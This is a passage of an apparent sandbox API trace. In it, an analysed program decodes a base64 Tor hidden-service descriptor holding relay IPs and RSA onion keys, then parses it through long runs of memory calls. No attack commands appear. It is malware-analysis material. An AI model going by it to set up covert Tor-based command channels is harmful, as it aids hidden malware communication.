pszString="aW50cm9kdWN0aW9uLXBvaW50IHBzc3R5bmd5eTRieG5pbGRyM3Qyc25maHptYnpzMjdjCmlwLWFkZHJlc3MgODAuMjExLjUzLjQ0Cm9uaW9uLXBvcnQgOTAwMQpvbmlvbi1rZXkKLS0tLS1CRUdJTiBSU0EgUFVCTElDIEtFWS0tLS0tCk1JR0pBb0dCQUtQeDdXK1dWekpXN1RvTGJTMnlhQzY2NEFZSmJaV0kySm9EMVlhQWxPVXlQYmdhaEhPMFNKU0sKNjJRQUdGdFdkc1RMV3cwZTl1RnhBNkJ1NHU0bHRXOW5WQVdkSXlUL2lpV3pCRjFZVVFqb3ZkMkZMbWV3dDhaZApsV2JreWpCTW9uT1J2UXBiQzJrejRWVGYzb0tNYWhnRlFMZXhJZFlBOFpYNU9Bak5WSVBaQWdNQkFBRT0KLS0tLS1FTkQgUlNBIFBVQkxJQyBLRVktLS0tLQpzZXJ2aWNlLWtleQotLS0tLUJFR0lOIFJTQSBQVUJMSUMgS0VZLS0tLS0KTUlHSkFvR0JBTTd5MnFXN1k3T3Z2REJ2RFIzWGtJUzlaMTAyR3NtcnVzSEFTNjNlVkRubTVyK3ZHSVU4NjljNgpMcWVYYmI2eERncmgvQ09PMWtxdmYyVHg1M01RdDFLbk9acUMzdlM3S2U3cUJVaVo0V04wMlQ3djdubjlxMFBIClhJZmpUTS9RYWVPR3dSWkIxdmF1S0pnOTlmTDhlQVVyaUdEeWhHQTIxMExzSGNJM1pTNlRBZ01CQUFFPQotLS0tLUVORCBSU0EgUFVCTElDIEtFWS0tLS0tCmludHJvZHVjdGlvbi1wb2ludCBmdHV3dmNxNXVhemdtdGVxNnYyazc2N200Z2ZnNWRwNAppcC1hZGRyZXNzIDg5LjE2My4xMjguMjgKb25pb24tcG9ydCA5MDAxCm9uaW9uLWtleQotLS0tLUJFR0lOIFJTQSBQVUJMSUMgS0VZLS0tLS0KTUlHSkFvR0JBT2dYa0NMcDlobEVtazVvcUc3K0V2RGREbGRQdUxrTWZLcFBKQkhNQ1pydFBWYUxEbTJHSzJ4NQpnZEYvQWJvTWgxcURJSk5lQmo3VVVSZnFEZWYvZXY5OVhFVGJPbUUwNDNhU3BaVzAzNnlFUnQvcTVpaGc4R2tBCjY2cGFHRE1GQ2M3c0lIT3ptb3ZTVzZCQ3hqZHp6cHk4TWhRdEx1Rk5aNHZlWmlNdWpXa2RBZ01CQUFFPQotLS0tLUVORCBSU0EgUFVCTElDIEtFWS0tLS0tCnNlcnZpY2Uta2V5Ci0tLS0tQkVHSU4gUlNBIFBVQkxJQyBLRVktLS0tLQpNSUdKQW9HQkFMOXYvNzViWkh6a2tDQW5XdThrWWd4U1dmYnJmOE9tcTJEb3FFdC9zVlBhcTl0NllqWVBmWUowClRZanhpbnNhT05CSFRlWHhkNnFnYVc2ZEZaczFSMENFZDJhRlJNVHdFWDRtM3h5Q2hGd2ZkTkdjblVaS1ZNanEKY2E3RDVzSE1CYlc4R2VMR2ZBUTdiOHRyOXJrMEM5TU5hejVYY3Z0Z1hKdFNBdDl5c2pkVkFnTUJBQUU9Ci0tLS0tRU5EIFJTQSBQVUJMSUMgS0VZLS0tLS0KaW50cm9kdWN0aW9uLXBvaW50IHpxdzVyY2JqdDNsM3BzdDVwb2pxZ3V2YW90djZkMmlnCmlwLWFkZHJlc3MgMTk1LjE1NC4xMTIuMjI4Cm9uaW9uLXBvcnQgOTAwMQpvbmlvbi1rZXkKLS0tLS1CRUdJTiBSU0EgUFVCTElDIEtFWS0tLS0tCk1JR0pBb0dCQU1EK1MwZ3psWUV6OGRrVzhwOHlxLy9CQmJ2cDQ2UURtT2RpNUVtcjNtY1U5TFFQSnVsaW1iRDcKTkpJMkkzZWNYT251THZqNGc2K0ZoQmR0enRXY3M4ZmFGRzdhWWhnN1FiSTJrVVYrL0dVWDUxejhDSFg0UWMwVwoxMlBoRHoxNFNYc2dET01OU2oxcXpOYlZweGlYbmcxZlpBTDNQamZybFJrVmVINVF4ZE1MQWdNQkFBRT0KLS0tLS1FTkQgUlNBIFBVQkxJQyBLRVktLS0tLQpzZXJ2aWNlLWtleQotLS0tLUJFR0lOIFJTQSBQVUJMSUMgS0VZLS0tLS0KTUlHSkFvR0JBTTE1SDdEYU1SK1RneWFFNFNGZ3hNZGUwem54aWNPZ01lVzVrUEFlOFA3U3dtR0V2R1FraXdqSApKNTQrZ0FxeWdrUXBDNURNY0hIaVZ1Y1RTWXZqY254dFA4Z1hOc1I1ajNmNTBHQk9ZLzdFdlBMdmFteWh2SzJsCm5FR0xKWnVHUUlRRlAzRXNYMEgwL0syU3B3Y2htYWNxbVM4U1RIL2dRRVFTZjVXTjY4REZBZ01CQUFFPQotLS0tLUVORCBSU0EgUFVCTElDIEtFWS0tLS0tCgo=", cchString=0x9a8, dwFlags=0x6, pbBinary=0x60cdc0, pcbBinary=0x316f450, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x60cdc0, pcbBinary=0x316f450, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0157.732] malloc (_Size=0x73e) returned 0x36929c0 [0157.733] free (_Block=0x0) [0157.733] malloc (_Size=0x73e) returned 0x3693108 [0157.733] free (_Block=0x0) [0157.733] malloc (_Size=0x34) returned 0x3624030 [0157.733] free (_Block=0x0) [0157.733] malloc (_Size=0x40) returned 0x3e22428 [0157.733] free (_Block=0x0) [0157.733] free (_Block=0x0) [0157.733] memchr (_Buf=0x369313c, _Val=10, _MaxCount=0x709) returned 0x3693153 [0157.733] malloc (_Size=0x18) returned 0x3f65340 [0157.733] free (_Block=0x0) [0157.733] free (_Block=0x0) [0157.733] memchr (_Buf=0x3693154, _Val=10, _MaxCount=0x6f1) returned 0x3693163 [0157.733] malloc (_Size=0x10) returned 0x3648cc8 [0157.733] free (_Block=0x0) [0157.733] free (_Block=0x0) [0157.733] memchr (_Buf=0x3693164, _Val=10, _MaxCount=0x6e1) returned 0x369316d [0157.734] malloc (_Size=0xa) returned 0x3648da0 [0157.734] free (_Block=0x0) [0157.734] free (_Block=0x0) [0157.734] memchr (_Buf=0x369316e, _Val=10, _MaxCount=0x6d7) returned 0x369318c [0157.734] malloc (_Size=0x1f) returned 0x3d802b0 [0157.734] free (_Block=0x0) [0157.734] malloc (_Size=0x140) returned 0x3dd3c08 [0157.734] free (_Block=0x3e22428) [0157.734] free (_Block=0x0) [0157.734] memchr (_Buf=0x369318d, _Val=10, _MaxCount=0x6b8) returned 0x36931cd [0157.734] malloc (_Size=0x41) returned 0x3def9f0 [0157.734] free (_Block=0x0) [0157.734] free (_Block=0x0) [0157.734] memchr (_Buf=0x36931ce, _Val=10, _MaxCount=0x677) returned 0x369320e [0157.734] malloc (_Size=0x41) returned 0x3defa40 [0157.734] free (_Block=0x0) [0157.735] free (_Block=0x0) [0157.735] memchr (_Buf=0x369320f, _Val=10, _MaxCount=0x636) returned 0x369324b [0157.735] malloc (_Size=0x3d) returned 0x3e22278 [0157.735] free (_Block=0x0) [0157.735] free (_Block=0x0) [0157.735] memchr (_Buf=0x369324c, _Val=10, _MaxCount=0x5f9) returned 0x3693268 [0157.735] malloc (_Size=0x1d) returned 0x3d801e8 [0157.735] free (_Block=0x0) [0157.735] free (_Block=0x0) [0157.735] memchr (_Buf=0x3693269, _Val=10, _MaxCount=0x5dc) returned 0x3693274 [0157.735] malloc (_Size=0xc) returned 0x3648ec0 [0157.735] free (_Block=0x0) [0157.735] free (_Block=0x0) [0157.735] memchr (_Buf=0x3693275, _Val=10, _MaxCount=0x5d0) returned 0x3693293 [0157.735] malloc (_Size=0x1f) returned 0x3d80238 [0157.736] free (_Block=0x0) [0157.736] free (_Block=0x0) [0157.736] memchr (_Buf=0x3693294, _Val=10, _MaxCount=0x5b1) returned 0x36932d4 [0157.736] malloc (_Size=0x41) returned 0x3defcc0 [0157.736] free (_Block=0x0) [0157.736] free (_Block=0x0) [0157.736] memchr (_Buf=0x36932d5, _Val=10, _MaxCount=0x570) returned 0x3693315 [0157.736] malloc (_Size=0x41) returned 0x3defae0 [0157.736] free (_Block=0x0) [0157.736] free (_Block=0x0) [0157.736] memchr (_Buf=0x3693316, _Val=10, _MaxCount=0x52f) returned 0x3693352 [0157.736] malloc (_Size=0x3d) returned 0x3e22038 [0157.736] free (_Block=0x0) [0157.736] free (_Block=0x0) [0157.737] memchr (_Buf=0x3693353, _Val=10, _MaxCount=0x4f2) returned 0x369336f [0157.737] malloc (_Size=0x1d) returned 0x3d80260 [0157.737] free (_Block=0x0) [0157.737] free (_Block=0x0) [0157.737] memchr (_Buf=0x3693370, _Val=10, _MaxCount=0x4d5) returned 0x36933a3 [0157.737] malloc (_Size=0x34) returned 0x3624470 [0157.737] free (_Block=0x0) [0157.737] free (_Block=0x0) [0157.737] memchr (_Buf=0x36933a4, _Val=10, _MaxCount=0x4a1) returned 0x36933bc [0157.737] malloc (_Size=0x19) returned 0x3d803f0 [0157.737] free (_Block=0x0) [0157.737] free (_Block=0x0) [0157.737] memchr (_Buf=0x36933bd, _Val=10, _MaxCount=0x488) returned 0x36933cc [0157.737] malloc (_Size=0x10) returned 0x3648db8 [0157.737] free (_Block=0x0) [0157.737] free (_Block=0x0) [0157.737] memchr (_Buf=0x36933cd, _Val=10, _MaxCount=0x478) returned 0x36933d6 [0157.738] malloc (_Size=0xa) returned 0x3648dd0 [0157.738] free (_Block=0x0) [0157.738] free (_Block=0x0) [0157.738] memchr (_Buf=0x36933d7, _Val=10, _MaxCount=0x46e) returned 0x36933f5 [0157.738] malloc (_Size=0x1f) returned 0x3d80148 [0157.738] free (_Block=0x0) [0157.738] free (_Block=0x0) [0157.738] memchr (_Buf=0x36933f6, _Val=10, _MaxCount=0x44f) returned 0x3693436 [0157.738] malloc (_Size=0x41) returned 0x3defb30 [0157.738] free (_Block=0x0) [0157.738] malloc (_Size=0x540) returned 0x60d508 [0157.738] free (_Block=0x3dd3c08) [0157.738] free (_Block=0x0) [0157.738] memchr (_Buf=0x3693437, _Val=10, _MaxCount=0x40e) returned 0x3693477 [0157.738] malloc (_Size=0x41) returned 0x3defb80 [0157.738] free (_Block=0x0) [0157.738] free (_Block=0x0) [0157.738] memchr (_Buf=0x3693478, _Val=10, _MaxCount=0x3cd) returned 0x36934b4 [0157.739] malloc (_Size=0x3d) returned 0x3e226f8 [0157.739] free (_Block=0x0) [0157.739] free (_Block=0x0) [0157.739] memchr (_Buf=0x36934b5, _Val=10, _MaxCount=0x390) returned 0x36934d1 [0157.739] malloc (_Size=0x1d) returned 0x3d80288 [0157.739] free (_Block=0x0) [0157.739] free (_Block=0x0) [0157.739] memchr (_Buf=0x36934d2, _Val=10, _MaxCount=0x373) returned 0x36934dd [0157.739] malloc (_Size=0xc) returned 0x3648d58 [0157.739] free (_Block=0x0) [0157.739] free (_Block=0x0) [0157.739] memchr (_Buf=0x36934de, _Val=10, _MaxCount=0x367) returned 0x36934fc [0157.739] malloc (_Size=0x1f) returned 0x3d80120 [0157.739] free (_Block=0x0) [0157.739] free (_Block=0x0) [0157.739] memchr (_Buf=0x36934fd, _Val=10, _MaxCount=0x348) returned 0x369353d [0157.739] malloc (_Size=0x41) returned 0x3defbd0 [0157.739] free (_Block=0x0) [0157.739] free (_Block=0x0) [0157.739] memchr (_Buf=0x369353e, _Val=10, _MaxCount=0x307) returned 0x369357e [0157.739] malloc (_Size=0x41) returned 0x3defc70 [0157.740] free (_Block=0x0) [0157.740] free (_Block=0x0) [0157.740] memchr (_Buf=0x369357f, _Val=10, _MaxCount=0x2c6) returned 0x36935bb [0157.740] malloc (_Size=0x3d) returned 0x3e22620 [0157.740] free (_Block=0x0) [0157.740] free (_Block=0x0) [0157.740] memchr (_Buf=0x36935bc, _Val=10, _MaxCount=0x289) returned 0x36935d8 [0157.740] malloc (_Size=0x1d) returned 0x3d800a8 [0157.740] free (_Block=0x0) [0157.740] free (_Block=0x0) [0157.740] memchr (_Buf=0x36935d9, _Val=10, _MaxCount=0x26c) returned 0x369360c [0157.740] malloc (_Size=0x34) returned 0x36245b0 [0157.740] free (_Block=0x0) [0157.740] free (_Block=0x0) [0157.740] memchr (_Buf=0x369360d, _Val=10, _MaxCount=0x238) returned 0x3693627 [0157.740] malloc (_Size=0x1b) returned 0x3d800d0 [0157.740] free (_Block=0x0) [0157.741] free (_Block=0x0) [0157.741] memchr (_Buf=0x3693628, _Val=10, _MaxCount=0x21d) returned 0x3693637 [0157.741] malloc (_Size=0x10) returned 0x3648f20 [0157.741] free (_Block=0x0) [0157.741] free (_Block=0x0) [0157.741] memchr (_Buf=0x3693638, _Val=10, _MaxCount=0x20d) returned 0x3693641 [0157.741] malloc (_Size=0xa) returned 0x3648e60 [0157.741] free (_Block=0x0) [0157.741] free (_Block=0x0) [0157.741] memchr (_Buf=0x3693642, _Val=10, _MaxCount=0x203) returned 0x3693660 [0157.741] malloc (_Size=0x1f) returned 0x3d80350 [0157.741] free (_Block=0x0) [0157.741] free (_Block=0x0) [0157.741] memchr (_Buf=0x3693661, _Val=10, _MaxCount=0x1e4) returned 0x36936a1 [0157.741] malloc (_Size=0x41) returned 0x3693920 [0157.741] free (_Block=0x0) [0157.741] free (_Block=0x0) [0157.741] memchr (_Buf=0x36936a2, _Val=10, _MaxCount=0x1a3) returned 0x36936e2 [0157.742] malloc (_Size=0x41) returned 0x3694000 [0157.742] free (_Block=0x0) [0157.742] free (_Block=0x0) [0157.742] memchr (_Buf=0x36936e3, _Val=10, _MaxCount=0x162) returned 0x369371f [0157.742] malloc (_Size=0x3d) returned 0x3e221e8 [0157.742] free (_Block=0x0) [0157.742] free (_Block=0x0) [0157.742] memchr (_Buf=0x3693720, _Val=10, _MaxCount=0x125) returned 0x369373c [0157.742] malloc (_Size=0x1d) returned 0x3d803c8 [0157.742] free (_Block=0x0) [0157.742] free (_Block=0x0) [0157.742] memchr (_Buf=0x369373d, _Val=10, _MaxCount=0x108) returned 0x3693748 [0157.742] malloc (_Size=0xc) returned 0x3648e18 [0157.742] free (_Block=0x0) [0157.742] free (_Block=0x0) [0157.742] memchr (_Buf=0x3693749, _Val=10, _MaxCount=0xfc) returned 0x3693767 [0157.742] malloc (_Size=0x1f) returned 0x3694a18 [0157.742] free (_Block=0x0) [0157.743] free (_Block=0x0) [0157.743] memchr (_Buf=0x3693768, _Val=10, _MaxCount=0xdd) returned 0x36937a8 [0157.743] malloc (_Size=0x41) returned 0x3693b00 [0157.743] free (_Block=0x0) [0157.743] free (_Block=0x0) [0157.743] memchr (_Buf=0x36937a9, _Val=10, _MaxCount=0x9c) returned 0x36937e9 [0157.743] malloc (_Size=0x41) returned 0x3693fb0 [0157.743] free (_Block=0x0) [0157.743] free (_Block=0x0) [0157.743] memchr (_Buf=0x36937ea, _Val=10, _MaxCount=0x5b) returned 0x3693826 [0157.743] malloc (_Size=0x3d) returned 0x3e226b0 [0157.743] free (_Block=0x0) [0157.743] free (_Block=0x0) [0157.743] memchr (_Buf=0x3693827, _Val=10, _MaxCount=0x1e) returned 0x3693843 [0157.743] malloc (_Size=0x1d) returned 0x3694a68 [0157.743] free (_Block=0x0) [0157.743] free (_Block=0x0) [0157.743] memchr (_Buf=0x3693844, _Val=10, _MaxCount=0x1) returned 0x3693844 [0157.743] malloc (_Size=0x1) returned 0x3f4c0b8 [0157.743] free (_Block=0x0) [0157.744] free (_Block=0x3f4c0b8) [0157.744] free (_Block=0x3693108) [0157.744] memchr (_Buf=0x3624030, _Val=32, _MaxCount=0x33) returned 0x3624042 [0157.744] malloc (_Size=0x13) returned 0x3f653c0 [0157.744] free (_Block=0x0) [0157.744] malloc (_Size=0x40) returned 0x3e22668 [0157.744] free (_Block=0x0) [0157.744] free (_Block=0x0) [0157.744] memchr (_Buf=0x3624043, _Val=32, _MaxCount=0x20) returned 0x0 [0157.744] malloc (_Size=0x21) returned 0x60dd38 [0157.744] free (_Block=0x0) [0157.744] free (_Block=0x0) [0157.744] malloc (_Size=0x14) returned 0x3f653e0 [0157.744] free (_Block=0x0) [0157.744] malloc (_Size=0x14) returned 0x3f65360 [0157.744] free (_Block=0x0) [0157.746] free (_Block=0x3f65360) [0157.746] free (_Block=0x3f653e0) [0157.746] free (_Block=0x3f653c0) [0157.746] free (_Block=0x60dd38) [0157.746] free (_Block=0x3e22668) [0157.746] memchr (_Buf=0x3f65340, _Val=32, _MaxCount=0x17) returned 0x3f6534a [0157.746] malloc (_Size=0xb) returned 0x3648e30 [0157.746] free (_Block=0x0) [0157.746] malloc (_Size=0x40) returned 0x3e22500 [0157.746] free (_Block=0x0) [0157.746] free (_Block=0x0) [0157.746] memchr (_Buf=0x3f6534b, _Val=32, _MaxCount=0xc) returned 0x0 [0157.746] malloc (_Size=0xd) returned 0x3648d70 [0157.746] free (_Block=0x0) [0157.746] free (_Block=0x0) [0157.746] free (_Block=0x3648e30) [0157.746] free (_Block=0x3648d70) [0157.746] free (_Block=0x3e22500) [0157.746] memchr (_Buf=0x3648cc8, _Val=32, _MaxCount=0xf) returned 0x3648cd2 [0157.746] malloc (_Size=0xb) returned 0x3648ed8 [0157.746] free (_Block=0x0) [0157.747] malloc (_Size=0x40) returned 0x3e22428 [0157.747] free (_Block=0x0) [0157.747] free (_Block=0x0) [0157.747] memchr (_Buf=0x3648cd3, _Val=32, _MaxCount=0x4) returned 0x0 [0157.747] malloc (_Size=0x5) returned 0x3f4c028 [0157.747] free (_Block=0x0) [0157.747] free (_Block=0x0) [0157.747] free (_Block=0x3648ed8) [0157.747] free (_Block=0x3f4c028) [0157.747] free (_Block=0x3e22428) [0157.747] memchr (_Buf=0x3648da0, _Val=32, _MaxCount=0x9) returned 0x0 [0157.747] malloc (_Size=0xa) returned 0x3648ed8 [0157.747] free (_Block=0x0) [0157.747] malloc (_Size=0x40) returned 0x3e221a0 [0157.747] free (_Block=0x0) [0157.747] free (_Block=0x0) [0157.747] free (_Block=0x3648ed8) [0157.747] free (_Block=0x3e221a0) [0157.747] memchr (_Buf=0x3d802b0, _Val=32, _MaxCount=0x1e) returned 0x3d802ba [0157.747] malloc (_Size=0xb) returned 0x3648e30 [0157.747] free (_Block=0x0) [0157.747] malloc (_Size=0x40) returned 0x3e22158 [0157.748] free (_Block=0x0) [0157.748] free (_Block=0x0) [0157.748] memchr (_Buf=0x3d802bb, _Val=32, _MaxCount=0x13) returned 0x3d802be [0157.748] malloc (_Size=0x4) returned 0x3f4bf58 [0157.748] free (_Block=0x0) [0157.748] free (_Block=0x0) [0157.748] memchr (_Buf=0x3d802bf, _Val=32, _MaxCount=0xf) returned 0x3d802c5 [0157.748] malloc (_Size=0x7) returned 0x3f4bf28 [0157.748] free (_Block=0x0) [0157.748] free (_Block=0x0) [0157.748] memchr (_Buf=0x3d802c6, _Val=32, _MaxCount=0x8) returned 0x0 [0157.748] malloc (_Size=0x9) returned 0x3648f38 [0157.748] free (_Block=0x0) [0157.748] free (_Block=0x0) [0157.748] free (_Block=0x3648e30) [0157.748] free (_Block=0x3f4bf58) [0157.748] free (_Block=0x3f4bf28) [0157.748] free (_Block=0x3648f38) [0157.748] free (_Block=0x3e22158) [0157.748] memchr (_Buf=0x3def9f0, _Val=32, _MaxCount=0x40) returned 0x0 [0157.748] malloc (_Size=0x41) returned 0x3694140 [0157.749] free (_Block=0x0) [0157.749] malloc (_Size=0x40) returned 0x3e22350 [0157.749] free (_Block=0x0) [0157.749] free (_Block=0x0) [0157.749] free (_Block=0x3694140) [0157.749] free (_Block=0x3e22350) [0157.749] memchr (_Buf=0x3defa40, _Val=32, _MaxCount=0x40) returned 0x0 [0157.749] malloc (_Size=0x41) returned 0x3693ce0 [0157.749] free (_Block=0x0) [0157.749] malloc (_Size=0x40) returned 0x3e22740 [0157.749] free (_Block=0x0) [0157.749] free (_Block=0x0) [0157.749] free (_Block=0x3693ce0) [0157.749] free (_Block=0x3e22740) [0157.749] memchr (_Buf=0x3e22278, _Val=32, _MaxCount=0x3c) returned 0x0 [0157.749] malloc (_Size=0x3d) returned 0x3e22548 [0157.749] free (_Block=0x0) [0157.749] malloc (_Size=0x40) returned 0x3e22398 [0157.749] free (_Block=0x0) [0157.749] free (_Block=0x0) [0157.750] free (_Block=0x3e22548) [0157.750] free (_Block=0x3e22398) [0157.750] memchr (_Buf=0x3d801e8, _Val=32, _MaxCount=0x1c) returned 0x3d801f0 [0157.750] malloc (_Size=0x9) returned 0x3648e78 [0157.750] free (_Block=0x0) [0157.750] malloc (_Size=0x40) returned 0x3e22500 [0157.750] free (_Block=0x0) [0157.750] free (_Block=0x0) [0157.750] memchr (_Buf=0x3d801f1, _Val=32, _MaxCount=0x13) returned 0x3d801f4 [0157.750] malloc (_Size=0x4) returned 0x3f4bf78 [0157.750] free (_Block=0x0) [0157.750] free (_Block=0x0) [0157.750] memchr (_Buf=0x3d801f5, _Val=32, _MaxCount=0xf) returned 0x3d801fb [0157.750] malloc (_Size=0x7) returned 0x3f4bf88 [0157.750] free (_Block=0x0) [0157.750] free (_Block=0x0) [0157.750] memchr (_Buf=0x3d801fc, _Val=32, _MaxCount=0x8) returned 0x0 [0157.750] malloc (_Size=0x9) returned 0x3648d70 [0157.750] free (_Block=0x0) [0157.750] free (_Block=0x0) [0157.750] free (_Block=0x3648e78) [0157.751] free (_Block=0x3f4bf78) [0157.751] free (_Block=0x3f4bf88) [0157.751] free (_Block=0x3648d70) [0157.751] free (_Block=0x3e22500) [0157.751] memchr (_Buf=0x3648ec0, _Val=32, _MaxCount=0xb) returned 0x0 [0157.751] malloc (_Size=0xc) returned 0x3648e30 [0157.751] free (_Block=0x0) [0157.751] malloc (_Size=0x40) returned 0x3e22398 [0157.751] free (_Block=0x0) [0157.751] free (_Block=0x0) [0157.751] free (_Block=0x3648e30) [0157.751] free (_Block=0x3e22398) [0157.751] memchr (_Buf=0x3d80238, _Val=32, _MaxCount=0x1e) returned 0x3d80242 [0157.751] malloc (_Size=0xb) returned 0x3648d28 [0157.751] free (_Block=0x0) [0157.751] malloc (_Size=0x40) returned 0x3e22470 [0157.751] free (_Block=0x0) [0157.751] free (_Block=0x0) [0157.751] memchr (_Buf=0x3d80243, _Val=32, _MaxCount=0x13) returned 0x3d80246 [0157.751] malloc (_Size=0x4) returned 0x3f4bfa8 [0157.751] free (_Block=0x0) [0157.752] free (_Block=0x0) [0157.752] memchr (_Buf=0x3d80247, _Val=32, _MaxCount=0xf) returned 0x3d8024d [0157.752] malloc (_Size=0x7) returned 0x3f4bfc8 [0157.752] free (_Block=0x0) [0157.752] free (_Block=0x0) [0157.752] memchr (_Buf=0x3d8024e, _Val=32, _MaxCount=0x8) returned 0x0 [0157.752] malloc (_Size=0x9) returned 0x3648ed8 [0157.752] free (_Block=0x0) [0157.752] free (_Block=0x0) [0157.752] free (_Block=0x3648d28) [0157.752] free (_Block=0x3f4bfa8) [0157.752] free (_Block=0x3f4bfc8) [0157.752] free (_Block=0x3648ed8) [0157.752] free (_Block=0x3e22470) [0157.752] memchr (_Buf=0x3defcc0, _Val=32, _MaxCount=0x40) returned 0x0 [0157.752] malloc (_Size=0x41) returned 0x3693c40 [0157.752] free (_Block=0x0) [0157.752] malloc (_Size=0x40) returned 0x3e224b8 [0157.752] free (_Block=0x0) [0157.752] free (_Block=0x0) [0157.753] malloc (_Size=0x41) returned 0x36938d0 [0157.753] free (_Block=0x0) [0157.753] free (_Block=0x3693c40) [0157.753] free (_Block=0x3e224b8) [0157.753] memchr (_Buf=0x3defae0, _Val=32, _MaxCount=0x40) returned 0x0 [0157.753] malloc (_Size=0x41) returned 0x3693c90 [0157.753] free (_Block=0x0) [0157.753] malloc (_Size=0x40) returned 0x3e227d0 [0157.753] free (_Block=0x0) [0157.753] free (_Block=0x0) [0157.753] malloc (_Size=0x81) returned 0x60c1d0 [0157.753] free (_Block=0x36938d0) [0157.753] free (_Block=0x3693c90) [0157.753] free (_Block=0x3e227d0) [0157.753] memchr (_Buf=0x3e22038, _Val=32, _MaxCount=0x3c) returned 0x0 [0157.753] malloc (_Size=0x3d) returned 0x3e22230 [0157.753] free (_Block=0x0) [0157.753] malloc (_Size=0x40) returned 0x3e22350 [0157.753] free (_Block=0x0) [0157.753] free (_Block=0x0) [0157.754] malloc (_Size=0xc1) returned 0x3692200 [0157.754] free (_Block=0x60c1d0) [0157.754] free (_Block=0x3e22230) [0157.754] free (_Block=0x3e22350) [0157.754] memchr (_Buf=0x3d80260, _Val=32, _MaxCount=0x1c) returned 0x3d80268 [0157.754] malloc (_Size=0x9) returned 0x3648e30 [0157.754] free (_Block=0x0) [0157.754] malloc (_Size=0x40) returned 0x3e22080 [0157.754] free (_Block=0x0) [0157.754] free (_Block=0x0) [0157.754] memchr (_Buf=0x3d80269, _Val=32, _MaxCount=0x13) returned 0x3d8026c [0157.754] malloc (_Size=0x4) returned 0x3f4c068 [0157.754] free (_Block=0x0) [0157.754] free (_Block=0x0) [0157.754] memchr (_Buf=0x3d8026d, _Val=32, _MaxCount=0xf) returned 0x3d80273 [0157.754] malloc (_Size=0x7) returned 0x3f4bf28 [0157.754] free (_Block=0x0) [0157.754] free (_Block=0x0) [0157.755] memchr (_Buf=0x3d80274, _Val=32, _MaxCount=0x8) returned 0x0 [0157.755] malloc (_Size=0x9) returned 0x3648d40 [0157.755] free (_Block=0x0) [0157.755] free (_Block=0x0) [0157.755] CryptStringToBinaryA (in: pszString="MIGJAoGBAM7y2qW7Y7OvvDBvDR3XkIS9Z102GsmrusHAS63eVDnm5r+vGIU869c6LqeXbb6xDgrh/COO1kqvf2Tx53MQt1KnOZqC3vS7Ke7qBUiZ4WN02T7v7nn9q0PHXIfjTM/QaeOGwRZB1vauKJg99fL8eAUriGDyhGA210LsHcI3ZS6TAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x0, pcbBinary=0x316f3b0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x316f3b0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0157.755] malloc (_Size=0x8c) returned 0x3d9e7b0 [0157.756] free (_Block=0x0) [0157.756] CryptStringToBinaryA (in: pszString="MIGJAoGBAM7y2qW7Y7OvvDBvDR3XkIS9Z102GsmrusHAS63eVDnm5r+vGIU869c6LqeXbb6xDgrh/COO1kqvf2Tx53MQt1KnOZqC3vS7Ke7qBUiZ4WN02T7v7nn9q0PHXIfjTM/QaeOGwRZB1vauKJg99fL8eAUriGDyhGA210LsHcI3ZS6TAgMBAAE=", cchString=0xbc, dwFlags=0x6, pbBinary=0x3d9e7b0, pcbBinary=0x316f3b0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3d9e7b0, pcbBinary=0x316f3b0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0157.756] malloc (_Size=0x8c) returned 0x3d9e680 [0157.756] free (_Block=0x0) [0157.756] free (_Block=0x3594e80) [0157.770] free (_Block=0x3d9e7b0) [0157.770] malloc (_Size=0x10) returned 0x3648e78 [0157.770] free (_Block=0x0) [0157.770] free (_Block=0x3648e30) [0157.770] free (_Block=0x3f4c068) [0157.771] free (_Block=0x3f4bf28) [0157.771] free (_Block=0x3648d40) [0157.771] free (_Block=0x3e22080) [0157.771] memchr (_Buf=0x3624470, _Val=32, _MaxCount=0x33) returned 0x3624482 [0157.771] malloc (_Size=0x13) returned 0x3f65360 [0157.771] free (_Block=0x0) [0157.771] malloc (_Size=0x40) returned 0x3e22350 [0157.771] free (_Block=0x0) [0157.771] free (_Block=0x0) [0157.771] memchr (_Buf=0x3624483, _Val=32, _MaxCount=0x20) returned 0x0 [0157.771] malloc (_Size=0x21) returned 0x60dd68 [0157.771] free (_Block=0x0) [0157.771] free (_Block=0x0) [0157.771] malloc (_Size=0x14) returned 0x3f65460 [0157.771] free (_Block=0x0) [0157.771] malloc (_Size=0x14) returned 0x3f653c0 [0157.771] free (_Block=0x0) [0157.771] free (_Block=0x3f653c0) [0157.771] free (_Block=0x3f65460) [0157.772] free (_Block=0x3f65360) [0157.772] free (_Block=0x60dd68) [0157.772] free (_Block=0x3e22350) [0157.772] memchr (_Buf=0x3d803f0, _Val=32, _MaxCount=0x18) returned 0x3d803fa [0157.772] malloc (_Size=0xb) returned 0x3648f38 [0157.772] free (_Block=0x0) [0157.772] malloc (_Size=0x40) returned 0x3e22110 [0157.772] free (_Block=0x0) [0157.772] free (_Block=0x0) [0157.772] memchr (_Buf=0x3d803fb, _Val=32, _MaxCount=0xd) returned 0x0 [0157.772] malloc (_Size=0xe) returned 0x3648e30 [0157.772] free (_Block=0x0) [0157.772] free (_Block=0x0) [0157.772] free (_Block=0x3648f38) [0157.772] free (_Block=0x3648e30) [0157.772] free (_Block=0x3e22110) [0157.772] memchr (_Buf=0x3648db8, _Val=32, _MaxCount=0xf) returned 0x3648dc2 [0157.772] malloc (_Size=0xb) returned 0x3648f08 [0157.772] free (_Block=0x0) [0157.772] malloc (_Size=0x40) returned 0x3e22470 [0157.773] free (_Block=0x0) [0157.773] free (_Block=0x0) [0157.773] memchr (_Buf=0x3648dc3, _Val=32, _MaxCount=0x4) returned 0x0 [0157.773] malloc (_Size=0x5) returned 0x3f4c028 [0157.773] free (_Block=0x0) [0157.773] free (_Block=0x0) [0157.773] free (_Block=0x3648f08) [0157.773] free (_Block=0x3f4c028) [0157.773] free (_Block=0x3e22470) [0157.773] memchr (_Buf=0x3648dd0, _Val=32, _MaxCount=0x9) returned 0x0 [0157.773] malloc (_Size=0xa) returned 0x3648e30 [0157.773] free (_Block=0x0) [0157.773] malloc (_Size=0x40) returned 0x3e22110 [0157.773] free (_Block=0x0) [0157.773] free (_Block=0x0) [0157.773] free (_Block=0x3648e30) [0157.773] free (_Block=0x3e22110) [0157.773] memchr (_Buf=0x3d80148, _Val=32, _MaxCount=0x1e) 